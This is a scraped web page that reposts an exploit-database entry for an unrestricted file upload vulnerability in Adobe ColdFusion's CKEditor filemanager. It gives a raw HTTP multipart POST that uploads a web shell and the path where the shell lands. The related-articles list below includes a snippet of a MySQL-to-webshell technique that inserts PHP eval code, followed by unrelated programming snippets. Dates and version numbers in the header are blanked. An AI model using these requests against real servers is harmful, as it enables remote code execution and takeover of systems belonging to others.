# Exploit Title: Unrestricted file upload in Adobe ColdFusion

# Google Dork: ext:cfm

# Date: --

# Exploit Author: Pete Freitag of Foundeo

# Reversed: Vahagn vah_13 Vardanian

# Vendor Homepage: adobe.com

# Version:

# Tested on: Adobe ColdFusion

# CVE : CVE--

# Comment: September , : Updates for ColdFusion  and ColdFusion

 have been elevated to Priority  due to a report that CVE--

is now being actively exploited.

```

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm

HTTP/1.1

Host: coldfusion:port

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,

like Gecko) Chrome/62.0.3202.9 Safari/537.36

Content-Type: multipart/form-data;

boundary=---------------------------

Content-Length:

Connection: close

Upgrade-Insecure-Requests: 

-----------------------------

Content-Disposition: form-data; name="file"; filename="shell_file"

Content-Type: image/jpeg

%shell code here%

-----------------------------

Content-Disposition: form-data; name="path"

shell

-------------------------------

```

a shell will be located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file

[EXP]Adobe ColdFusion 2018 - Arbitrary File Upload的更多相关文章

  1. FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://www.wooyun.org ...

  2. jQuery File Upload 单页面多实例的实现

    jQuery File Upload 的 GitHub 地址:https://github.com/blueimp/jQuery-File-Upload 插件描述:jQuery File Upload ...

  3. 【转发】Html5 File Upload with Progress

    Html5 File Upload with Progress               Posted by Shiv Kumar on 25th September, 2010Senior Sof ...

  4. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  5. CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server

    CVE-2019-0214: Apache Archiva arbitrary file write and delete on the server Severity: Medium Vendor: ...

  6. jQuery File Upload done函数没有返回

    最近在使用jQuery File Upload 上传图片时发现一个问题,发现done函数没有callback,经过一番折腾,找到问题原因,是由于dataType: ‘json’造成的,改为autoUp ...

  7. kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

    kindeditor多图片上传找不到action原来是private File upload成员变量惹得祸

  8. 用jQuery File Upload做的上传控件demo,支持同页面多个上传按钮

    需求 有这么一个需求,一个form有多个文件要上传,但又不是传统的图片批量上传那种,是类似下图这种需求,一开始是用的swfupload做的上传,但是问题是如果有多个按钮的话,就要写很多重复的代码,于为 ...

  9. jquery file upload 文件上传插件

    1. jquery file upload 下载 jquery file upload Demo 地址:https://blueimp.github.io/jQuery-File-Upload/ jq ...

随机推荐

  1. Java学习笔记(十五):import关键字

  2. TZOJ 4244 Sum(单调栈区间极差)

    描述 Given a sequence, we define the seqence's value equals the difference between the largest element ...

  3. 交叉编译sudo

    编译Sudo version 1.8.6p7下载路径:https://www.sudo.ws/news.html 1.交叉编译 # tar -xvf sudo-1.8.6p7.tar.gz # cd ...

  4. Math的方法;Date的方法;

    Math的方法: (1)弧度的π  Math.PI() (2)返回平方根 Math.sqrt() (3)返回x的绝对值 Mathabs(x) (4)返回x的上舍入 Math.ceil(x) (5)返回 ...

  5. gdb调试技巧 找到php执行进程当前执行的代码

    假设线上有一段php脚本,突然在某天出问题了,不处理但是进程没有退出.这种情况可能是异常休眠或者是有段死循环代码,但是我们怎么定位呢,我们这个时候最想知道的应该是这个脚本在此刻在做什么吧.这个是gdb ...

  6. CentOS_mini下安装docker 之 yum mount

    --->linux 终端输出太多前面看不到的解决办法:shift+page up --->mount命令[-参数] [设备名称] [挂载点] mkdir /mnt/CentOS mount ...

  7. predict predict_proba区别的小例子

    predict_proba返回的是一个n行k列的数组,第i行第j列上的数值是模型预测第i个预测样本的标签为j的概率.所以每一行的和应该等于1. 举个例子 >>> from sklea ...

  8. 一句话shell【php】

    1.mysql执行语句拿shell Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES('<?php @eval($_P ...

  9. 接口测试3A原则

    手工的功能测试用例也可以用3A原则来编写. Arrange: 准备被测功能相关的测试数据,比如往系统里录入一批工单以便测试工单的分页功能 Act : 调用被测的功能,实际上这就是我们一直讲的测试步骤 ...

  10. AX_List

    List list = new List(Types::Class);  CustTable custTable;  while select custTable  {      list.addEn ...